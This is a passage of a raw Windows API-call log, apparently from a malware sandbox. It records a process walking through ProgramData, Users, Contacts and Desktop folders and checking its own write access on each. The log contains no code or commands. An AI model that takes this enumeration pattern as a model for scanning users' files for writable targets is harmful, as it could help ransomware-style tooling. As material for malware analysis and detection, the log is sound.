lpFileName="c:\\ProgramData\\Sun\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.289] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Sun", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.290] GetLastError () returned 0x7a [0106.290] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Sun", RequestedInformation=0x7, pSecurityDescriptor=0x5727e0, nLength=0xb8, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x5727e0, lpnLengthNeeded=0x281c090) returned 1 [0106.290] GetLastError () returned 0x7a [0106.290] GetCurrentThread () returned 0xfffffffe [0106.290] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.290] GetCurrentProcess () returned 0xffffffff [0106.290] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.290] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.290] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.290] AccessCheck (in: pSecurityDescriptor=0x5727e0, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.290] CloseHandle (hObject=0x33c) returned 1 [0106.290] CloseHandle (hObject=0x334) returned 1 [0106.290] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.290] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.290] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Sun\\Java\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.290] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Sun\\Java", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.290] GetLastError () returned 0x7a [0106.290] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Sun\\Java", RequestedInformation=0x7, pSecurityDescriptor=0x5727e0, nLength=0xb8, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x5727e0, lpnLengthNeeded=0x281baf8) returned 1 [0106.290] GetLastError () returned 0x7a [0106.290] GetCurrentThread () returned 0xfffffffe [0106.290] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.290] GetCurrentProcess () returned 0xffffffff [0106.290] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.290] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.290] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.290] AccessCheck (in: pSecurityDescriptor=0x5727e0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.291] CloseHandle (hObject=0x344) returned 1 [0106.291] CloseHandle (hObject=0x33c) returned 1 [0106.291] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.291] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.291] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.291] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.291] GetLastError () returned 0x7a [0106.291] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Sun\\Java\\Java Update", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xb8, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281b560) returned 1 [0106.291] GetLastError () returned 0x7a [0106.291] GetCurrentThread () returned 0xfffffffe [0106.291] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.291] GetCurrentProcess () returned 0xffffffff [0106.291] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.291] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.291] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.291] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.291] CloseHandle (hObject=0x32c) returned 1 [0106.291] CloseHandle (hObject=0x344) returned 1 [0106.291] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.291] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.291] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.291] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.291] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.291] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.292] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0 [0106.292] FindClose (in: hFindFile=0x5fc2d8 | out: hFindFile=0x5fc2d8) returned 1 [0106.292] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.292] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 0 [0106.292] FindClose (in: hFindFile=0x5fc298 | out: hFindFile=0x5fc298) returned 1 [0106.292] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0106.292] FindFirstFileW (in: lpFileName="c:\\Recovery\\*", lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 0xffffffff [0106.292] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0106.292] FindNextFileW (in: hFindFile=0x5fc258, lpFindFileData=0x281cbe4 | out: lpFindFileData=0x281cbe4) returned 1 [0106.292] FindFirstFileW (in: lpFileName="c:\\Users\\*", lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 0x5fc298 [0106.292] GetFileSecurityW (in: lpFileName="c:\\Users", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c628 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c628) returned 0 [0106.292] GetLastError () returned 0x7a [0106.292] GetFileSecurityW (in: lpFileName="c:\\Users", RequestedInformation=0x7, pSecurityDescriptor=0x28a4408, nLength=0xc0, lpnLengthNeeded=0x281c628 | out: pSecurityDescriptor=0x28a4408, lpnLengthNeeded=0x281c628) returned 1 [0106.293] GetLastError () returned 0x7a [0106.293] GetCurrentThread () returned 0xfffffffe [0106.293] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c630 | out: TokenHandle=0x281c630*=0x0) returned 0 [0106.293] GetCurrentProcess () returned 0xffffffff [0106.293] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c630 | out: TokenHandle=0x281c630*=0x330) returned 1 [0106.293] DuplicateToken (in: ExistingTokenHandle=0x330, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c62c | out: DuplicateTokenHandle=0x281c62c*=0x334) returned 1 [0106.293] MapGenericMask (in: AccessMask=0x281c63c, GenericMapping=0x281c60c | out: AccessMask=0x281c63c) [0106.293] AccessCheck (in: pSecurityDescriptor=0x28a4408, ClientToken=0x334, DesiredAccess=0x120116, GenericMapping=0x281c60c, PrivilegeSet=0x281c5f8, PrivilegeSetLength=0x281c61c, GrantedAccess=0x281c620, AccessStatus=0x281c624 | out: PrivilegeSet=0x281c5f8, PrivilegeSetLength=0x281c61c, GrantedAccess=0x281c620, AccessStatus=0x281c624) returned 1 [0106.293] CloseHandle (hObject=0x334) returned 1 [0106.293] CloseHandle (hObject=0x330) returned 1 [0106.293] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.293] FindNextFileW (in: hFindFile=0x5fc298, lpFindFileData=0x281c64c | out: lpFindFileData=0x281c64c) returned 1 [0106.293] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\*", lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 0x5fc2d8 [0106.293] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281c090) returned 0 [0106.293] GetLastError () returned 0x7a [0106.293] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0x84, lpnLengthNeeded=0x281c090 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281c090) returned 1 [0106.293] GetLastError () returned 0x7a [0106.293] GetCurrentThread () returned 0xfffffffe [0106.293] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x0) returned 0 [0106.293] GetCurrentProcess () returned 0xffffffff [0106.293] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281c098 | out: TokenHandle=0x281c098*=0x334) returned 1 [0106.293] DuplicateToken (in: ExistingTokenHandle=0x334, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281c094 | out: DuplicateTokenHandle=0x281c094*=0x33c) returned 1 [0106.293] MapGenericMask (in: AccessMask=0x281c0a4, GenericMapping=0x281c074 | out: AccessMask=0x281c0a4) [0106.293] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x33c, DesiredAccess=0x120116, GenericMapping=0x281c074, PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c | out: PrivilegeSet=0x281c060, PrivilegeSetLength=0x281c084, GrantedAccess=0x281c088, AccessStatus=0x281c08c) returned 1 [0106.293] CloseHandle (hObject=0x33c) returned 1 [0106.293] CloseHandle (hObject=0x334) returned 1 [0106.293] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.293] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.293] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.294] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.294] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.294] GetLastError () returned 0x7a [0106.294] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts", RequestedInformation=0x7, pSecurityDescriptor=0x5727e0, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x5727e0, lpnLengthNeeded=0x281baf8) returned 1 [0106.294] GetLastError () returned 0x7a [0106.294] GetCurrentThread () returned 0xfffffffe [0106.294] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.294] GetCurrentProcess () returned 0xffffffff [0106.294] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.294] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.294] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.294] AccessCheck (in: pSecurityDescriptor=0x5727e0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.294] CloseHandle (hObject=0x344) returned 1 [0106.294] CloseHandle (hObject=0x33c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.294] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.294] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.295] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.295] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.295] GetLastError () returned 0x7a [0106.295] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281baf8) returned 1 [0106.295] GetLastError () returned 0x7a [0106.295] GetCurrentThread () returned 0xfffffffe [0106.295] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.295] GetCurrentProcess () returned 0xffffffff [0106.295] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.295] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.295] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.295] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.295] CloseHandle (hObject=0x344) returned 1 [0106.295] CloseHandle (hObject=0x33c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.295] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.296] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.296] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.296] GetLastError () returned 0x7a [0106.296] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF", RequestedInformation=0x7, pSecurityDescriptor=0x57fb38, nLength=0x98, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x57fb38, lpnLengthNeeded=0x281b560) returned 1 [0106.296] GetLastError () returned 0x7a [0106.296] GetCurrentThread () returned 0xfffffffe [0106.296] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.297] GetCurrentProcess () returned 0xffffffff [0106.297] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.297] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.297] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.297] AccessCheck (in: pSecurityDescriptor=0x57fb38, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.297] CloseHandle (hObject=0x32c) returned 1 [0106.297] CloseHandle (hObject=0x344) returned 1 [0106.297] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.297] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.297] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.297] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.297] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.297] GetLastError () returned 0x7a [0106.297] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\aLldt37So 5xCJ", RequestedInformation=0x7, pSecurityDescriptor=0x57fb38, nLength=0x98, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x57fb38, lpnLengthNeeded=0x281afc8) returned 1 [0106.297] GetLastError () returned 0x7a [0106.297] GetCurrentThread () returned 0xfffffffe [0106.297] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.297] GetCurrentProcess () returned 0xffffffff [0106.297] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.297] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.297] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.297] AccessCheck (in: pSecurityDescriptor=0x57fb38, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.297] CloseHandle (hObject=0x340) returned 1 [0106.297] CloseHandle (hObject=0x32c) returned 1 [0106.297] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.297] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.298] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.298] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.298] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.298] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.298] GetLastError () returned 0x7a [0106.298] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N", RequestedInformation=0x7, pSecurityDescriptor=0x28a9cc0, nLength=0x98, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a9cc0, lpnLengthNeeded=0x281afc8) returned 1 [0106.298] 